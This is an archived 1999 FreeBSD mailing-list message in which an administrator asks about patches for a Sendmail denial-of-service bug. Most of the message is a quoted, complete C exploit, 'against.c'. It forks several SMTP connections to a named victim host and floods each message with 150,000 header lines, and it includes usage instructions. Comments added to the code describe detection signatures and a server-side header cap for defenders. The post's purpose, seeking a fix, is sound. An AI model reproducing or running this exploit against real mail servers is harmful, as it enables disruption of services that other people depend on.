Date:      Tue, 19 Jan 1999 14:52:56 -0500
From:      Mike Tancsa <mike@sentex.net>
To:        questions@FreeBSD.ORG
Subject:   latest sendmail DOS
Message-ID:  <3.0.5.32.19990119145256.02a1a870@staff.sentex.ca>


Are there any patches available for the Sendmail DoS below?

Thanks,

	---Mike

/*
  against.c - Another Sendmail (and pine ;-) DoS (up to 8.9.2)
  (c) 1999 by <marchew@linux.lepszy.od.kobiety.pl>

  Usage: ./against existing_user_on_victim_host victim_host
  Example: ./against nobody lamers.net

*/

#include <stdio.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
#include <errno.h>
#include <signal.h>
#include <getopt.h>
#include <stdlib.h>
#include <string.h>

/* Number of child processes main() forks; each child opens one SMTP
   connection, so this is also the number of concurrent sessions a
   receiving MTA sees from a single run. */
#define MAXCONN 5
/* Number of identical "To: x" header lines each child writes after DATA.
   At 6 bytes per line that is roughly 900 KB of header text per message,
   which is the figure a server-side header-size limit has to sit below. */
#define LINES   150000

/* Resolver result for the host named in argv[2]. */
struct hostent *hp;
/* Destination socket address; filled in inside each child. */
struct sockaddr_in s;
/* suck: socket descriptor.  loop: fork counter in the parent, header-line
   counter in each child, and finally the waitpid() status slot.  x: return
   value of the most recent fork().  All three rely on file-scope
   zero-initialisation; main() never assigns loop before its first use. */
int suck,loop,x;

/*
 * Proof-of-concept quoted in this message.  It resolves argv[2], forks
 * MAXCONN children, and each child submits one SMTP message to port 25
 * whose header section consists of LINES repetitions of "To: x".
 *
 * What a defender can take from the code as written:
 *   - Wire pattern: MAXCONN simultaneous sessions from one source, each
 *     with the fixed strings "helo tweety" and
 *     "mail from: tweety@polbox.com", bare-LF line endings, and commands
 *     written without reading any server reply (the stream is write-only).
 *     The fixed strings are specific to this sample and trivially changed,
 *     so they are weak signatures on their own.
 *   - The durable control is server-side: cap the total header size
 *     accepted per message and bound per-client concurrent connections.
 *     NOTE(review): later sendmail releases expose a MaxHeadersLength
 *     option for the header cap - confirm the fixed release against the
 *     vendor release notes; the page itself only states "up to 8.9.2".
 *   - Why the repeated header is expensive for the server is not shown
 *     here; presumably address-header processing cost - verify against the
 *     vendor advisory.
 *
 * Returns 0 from the parent; exits 0 on bad usage and 1 when name
 * resolution fails.
 */
int main(int argc,char* argv[]) {
  
  printf("against.c - another Sendmail DoS (up to 8.9.2)\n");

  /* argc-3 is non-zero unless exactly two arguments were given. */
  if (argc-3) {
    printf("Usage: %s victim_user victim_host\n",argv[0]);
    exit(0);
  }
    
  hp=gethostbyname(argv[2]);
  
  if (!hp) {
    /* gethostbyname() reports failures through h_errno, so the text
       perror() prints here may not describe the real cause. */
    perror("gethostbyname");
    exit(1);
  }

  fprintf(stderr,"Doing mess: ");

  /* Parent: fork MAXCONN times.  Only the child (fork() == 0) enters the
     body, and the body always ends in exit(), so a child never continues
     the outer loop. */
  for (;loop<MAXCONN;loop++) if (!(x=fork())) {
    FILE* d;
    /* Build the destination from the first resolved address, port 25. */
    bcopy(hp->h_addr,(void*)&s.sin_addr,hp->h_length);
    s.sin_family=hp->h_addrtype;
    s.sin_port=htons(25);
    /* socket()/connect() failures are only reported; execution continues
       with the descriptor as-is. */
    if ((suck=socket(AF_INET,SOCK_STREAM,0))<0) perror("socket");
    if (connect(suck,(struct sockaddr *)&s,sizeof(s))) perror("connect");
    /* Write-only stdio stream over the socket: server replies are never
       read, so the SMTP dialogue below is not synchronised with them. */
    if (!(d=fdopen(suck,"w"))) { perror("fdopen"); exit(0); }

    usleep(100000);

    /* Envelope with hard-coded HELO name and sender; the recipient is
       argv[1]@argv[2].  Lines end in LF only, not CRLF. */
    fprintf(d,"helo tweety\n");
    fprintf(d,"mail from: tweety@polbox.com\n");
    fprintf(d,"rcpt to: %s@%s\n",argv[1],argv[2]);
    fprintf(d,"data\n");

    usleep(100000);

    /* Header section: LINES identical "To: x" lines.  `loop` here is the
       child's own copy of the global, reused as the line counter; a
       progress dot goes to stderr every 100 lines. */
    for(loop=0;loop<LINES;loop++) {
      if (!(loop%100)) fprintf(stderr,".");
      fprintf(d,"To: x\n");
    }

    /* Blank lines end the headers; a token body follows. */
    fprintf(d,"\n\n\nsomedata\n\n\n");

    /* Lone dot terminates the DATA phase. */
    fprintf(d,".\n");

    sleep(1);

    fprintf(d,"quit\n");
    fflush(d);

    /* The connection is held open for 100 s after QUIT is written before
       being shut down in both directions (how == 2) and closed. */
    sleep(100);
    shutdown(suck,2);
    close(suck);
    exit(0);
  }

  /* x holds only the pid returned by the last fork(), so the parent waits
     for that one child; `loop` is overwritten with its exit status. */
  waitpid(x,&loop,0);

  fprintf(stderr,"ok\n");

  return 0;
}

------------------------------------------------------------------------
Mike Tancsa,                          	          tel 01.519.651.3400
Network Administrator,     			  noc@sentex.net
Sentex Communications                 		  www.sentex.net
Cambridge, Ontario Canada

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message


